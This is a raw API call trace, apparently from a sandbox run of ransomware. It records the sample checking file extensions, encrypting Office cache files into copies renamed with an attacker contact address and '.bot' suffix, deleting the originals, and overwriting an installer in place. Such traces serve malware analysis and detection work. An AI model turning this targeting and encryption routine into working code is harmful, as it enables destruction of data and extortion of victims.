	[0050.284] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76
	[0050.284] lstrlenW (lpString=".doc") returned 4
	[0050.284] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0050.284] lstrlenW (lpString=".docx") returned 5
	[0050.284] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1
	[0050.284] lstrlenW (lpString=".pdf") returned 4
	[0050.284] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0050.284] lstrlenW (lpString=".xls") returned 4
	[0050.284] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0050.284] lstrlenW (lpString=".xlsx") returned 5
	[0050.284] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1
	[0050.284] lstrlenW (lpString=".ppt") returned 4
	[0050.284] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0050.284] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76
	[0050.284] lstrlenW (lpString=".zip") returned 4
	[0050.284] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0050.284] lstrlenW (lpString=".rar") returned 4
	[0050.284] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0050.284] lstrlenW (lpString=".bz2") returned 4
	[0050.284] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0050.284] lstrlenW (lpString=".7z") returned 3
	[0050.284] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0050.284] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76
	[0050.284] lstrlenW (lpString=".dbf") returned 4
	[0050.284] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0050.284] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76
	[0050.284] lstrlenW (lpString=".1cd") returned 4
	[0050.284] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0050.284] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76
	[0050.284] lstrlenW (lpString=".jpg") returned 4
	[0050.284] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0050.284] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76
	[0050.284] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76
	[0050.285] lstrlenW (lpString=".doc") returned 4
	[0050.285] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0050.285] lstrlenW (lpString=".docx") returned 5
	[0050.285] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1
	[0050.285] lstrlenW (lpString=".pdf") returned 4
	[0050.285] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0050.285] lstrlenW (lpString=".xls") returned 4
	[0050.285] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0050.285] lstrlenW (lpString=".xlsx") returned 5
	[0050.285] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1
	[0050.285] lstrlenW (lpString=".ppt") returned 4
	[0050.285] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0050.285] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76
	[0050.285] lstrlenW (lpString=".zip") returned 4
	[0050.285] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0050.285] lstrlenW (lpString=".rar") returned 4
	[0050.285] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0050.285] lstrlenW (lpString=".bz2") returned 4
	[0050.285] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0050.285] lstrlenW (lpString=".7z") returned 3
	[0050.285] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0050.285] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76
	[0050.285] lstrlenW (lpString=".dbf") returned 4
	[0050.286] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0050.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76
	[0050.286] lstrlenW (lpString=".1cd") returned 4
	[0050.286] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0050.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76
	[0050.286] lstrlenW (lpString=".jpg") returned 4
	[0050.286] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0050.286] lstrcmpiW (lpString1=".xrm-ms", lpString2=".bot") returned 1
	[0050.286] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24
	[0050.286] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0050.286] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=715834) returned 1
	[0050.286] CloseHandle (hObject=0x21c) returned 1
	[0050.286] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020
	[0050.286] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.287] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0050.287] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.287] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.287] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0050.287] GetLastError () returned 0x0
	[0050.287] ReadFile (in: hFile=0x21c, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0xaec3a, lpOverlapped=0x0) returned 1
	[0050.301] WriteFile (in: hFile=0x214, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xaec40, lpOverlapped=0x0) returned 1
	[0050.315] ReadFile (in: hFile=0x21c, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0050.315] WriteFile (in: hFile=0x214, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x104, lpOverlapped=0x0) returned 1
	[0050.316] SetEndOfFile (hFile=0x214) returned 1
	[0050.316] CloseHandle (hObject=0x214) returned 1
	[0050.316] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.316] SetEndOfFile (hFile=0x21c) returned 1
	[0050.546] CloseHandle (hObject=0x21c) returned 1
	[0050.546] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0050.546] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1
	[0050.547] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0050.547] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0050.547] lstrlenW (lpString=".doc") returned 4
	[0050.547] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1
	[0050.547] lstrlenW (lpString=".docx") returned 5
	[0050.547] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1
	[0050.548] lstrlenW (lpString=".pdf") returned 4
	[0050.549] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1
	[0050.549] lstrlenW (lpString=".xls") returned 4
	[0050.549] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1
	[0050.550] lstrlenW (lpString=".xlsx") returned 5
	[0050.551] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1
	[0050.551] lstrlenW (lpString=".ppt") returned 4
	[0050.551] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1
	[0050.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0050.560] lstrlenW (lpString=".zip") returned 4
	[0050.560] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1
	[0050.560] lstrlenW (lpString=".rar") returned 4
	[0050.560] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1
	[0050.560] lstrlenW (lpString=".bz2") returned 4
	[0050.561] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1
	[0050.562] lstrlenW (lpString=".7z") returned 3
	[0050.563] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1
	[0050.563] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0050.563] lstrlenW (lpString=".dbf") returned 4
	[0050.563] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1
	[0050.563] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0050.565] lstrlenW (lpString=".1cd") returned 4
	[0050.565] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1
	[0050.565] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0050.565] lstrlenW (lpString=".jpg") returned 4
	[0050.565] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1
	[0050.568] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0050.571] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0050.571] lstrlenW (lpString=".doc") returned 4
	[0050.571] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1
	[0050.572] lstrlenW (lpString=".docx") returned 5
	[0050.573] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1
	[0050.575] lstrlenW (lpString=".pdf") returned 4
	[0050.579] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1
	[0050.581] lstrlenW (lpString=".xls") returned 4
	[0050.582] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1
	[0050.584] lstrlenW (lpString=".xlsx") returned 5
	[0050.584] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1
	[0050.584] lstrlenW (lpString=".ppt") returned 4
	[0050.584] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1
	[0050.584] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0050.584] lstrlenW (lpString=".zip") returned 4
	[0050.584] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1
	[0050.584] lstrlenW (lpString=".rar") returned 4
	[0050.585] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1
	[0050.587] lstrlenW (lpString=".bz2") returned 4
	[0050.588] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1
	[0050.588] lstrlenW (lpString=".7z") returned 3
	[0050.588] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1
	[0050.588] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0050.588] lstrlenW (lpString=".dbf") returned 4
	[0050.588] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1
	[0050.589] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0050.589] lstrlenW (lpString=".1cd") returned 4
	[0050.589] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1
	[0050.589] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0050.590] lstrlenW (lpString=".jpg") returned 4
	[0050.591] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1
	[0050.595] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0050.595] lstrlenW (lpString="VisiorWW.msi") returned 12
	[0050.595] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0050.595] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=12060672) returned 1
	[0050.595] CloseHandle (hObject=0x21c) returned 1
	[0050.595] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi")) returned 0x2020
	[0050.595] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0050.596] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0050.596] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0050.596] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0x0) returned 1
	[0050.596] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0050.596] ReadFile (in: hFile=0x21c, lpBuffer=0xb0b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0b0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0050.599] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3d5800, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0050.599] ReadFile (in: hFile=0x21c, lpBuffer=0xb0f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0f0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0050.608] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0050.609] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb40800, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0050.609] ReadFile (in: hFile=0x21c, lpBuffer=0xb130058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb130058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0050.623] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0050.623] WriteFile (in: hFile=0x21c, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0xa55fcb0, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fcb0*=0xc0104, lpOverlapped=0x0) returned 1
	[0050.651] SetEndOfFile (hFile=0x21c) returned 1
	[0050.651] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4fb810
	[0050.655] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0050.655] WriteFile (in: hFile=0x21c, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0050.656] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3d5800, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0050.657] WriteFile (in: hFile=0x21c, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0050.665] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb40800, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0050.665] WriteFile (in: hFile=0x21c, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0050.667] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4fb810 | out: hHeap=0x7d60000) returned 1
	[0050.669] CloseHandle (hObject=0x21c) returned 1
	[0050.669] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0050.669] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75
	[0050.669] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75
	[0050.669] lstrlenW (lpString=".doc") returned 4
	[0050.669] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0050.669] lstrlenW (lpString=".docx") returned 5
	[0050.669] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1
	[0050.669] lstrlenW (lpString=".pdf") returned 4
	[0050.669] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0050.669] lstrlenW (lpString=".xls") returned 4
	[0050.669] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0050.669] lstrlenW (lpString=".xlsx") returned 5
	[0050.670] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1
	[0050.670] lstrlenW (lpString=".ppt") returned 4
	[0050.670] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0050.670] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75
	[0050.670] lstrlenW (lpString=".zip") returned 4
	[0050.670] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0050.670] lstrlenW (lpString=".rar") returned 4
	[0050.670] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0050.670] lstrlenW (lpString=".bz2") returned 4
	[0050.670] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0050.670] lstrlenW (lpString=".7z") returned 3
	[0050.670] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0050.670] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75
	[0050.670] lstrlenW (lpString=".dbf") returned 4
	[0050.670] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0050.670] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75
	[0050.670] lstrlenW (lpString=".1cd") returned 4
	[0050.670] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0050.670] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75
	[0050.670] lstrlenW (lpString=".jpg") returned 4
	[0050.670] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0050.670] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75
	[0050.670] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75
	[0050.670] lstrlenW (lpString=".doc") returned 4
	[0050.670] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0050.670] lstrlenW (lpString=".docx") returned 5
	[0050.670] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1
	[0050.670] lstrlenW (lpString=".pdf") returned 4
	[0050.670] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0050.670] lstrlenW (lpString=".xls") returned 4
	[0050.670] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0050.670] lstrlenW (lpString=".xlsx") returned 5
	[0050.670] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1
	[0050.670] lstrlenW (lpString=".ppt") returned 4
	[0050.671] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0050.671] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75
	[0050.671] lstrlenW (lpString=".zip") returned 4
	[0050.671] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0050.671] lstrlenW (lpString=".rar") returned 4
	[0050.671] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0050.671] lstrlenW (lpString=".bz2") returned 4
	[0050.671] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0050.671] lstrlenW (lpString=".7z") returned 3
	[0050.671] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0050.671] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75
	[0050.671] lstrlenW (lpString=".dbf") returned 4
	[0050.671] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0050.671] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75
	[0050.671] lstrlenW (lpString=".1cd") returned 4
	[0050.671] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0050.671] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75
	[0050.671] lstrlenW (lpString=".jpg") returned 4
	[0050.671] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0050.671] lstrcmpiW (lpString1=".sys", lpString2=".bot") returned 1
	[0050.671] lstrlenW (lpString="pagefile.sys") returned 12
	[0050.671] CreateFileW (lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0050.671] lstrlenW (lpString="C:\\pagefile.sys") returned 15
	[0050.671] lstrlenW (lpString="C:\\pagefile.sys") returned 15
	[0050.671] lstrlenW (lpString=".doc") returned 4
	[0050.671] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1
	[0050.671] lstrlenW (lpString=".docx") returned 5
	[0050.671] lstrcmpiW (lpString1=".docx", lpString2="e.sys") returned -1
	[0050.672] lstrlenW (lpString=".pdf") returned 4
	[0050.672] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1
	[0050.672] lstrlenW (lpString=".xls") returned 4
	[0050.672] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1
	[0050.672] lstrlenW (lpString=".xlsx") returned 5
	[0050.672] lstrcmpiW (lpString1=".xlsx", lpString2="e.sys") returned -1
	[0050.672] lstrlenW (lpString=".ppt") returned 4
	[0050.672] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1
	[0050.672] lstrlenW (lpString="C:\\pagefile.sys") returned 15
	[0050.672] lstrlenW (lpString=".zip") returned 4
	[0050.672] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1
	[0050.672] lstrlenW (lpString=".rar") returned 4
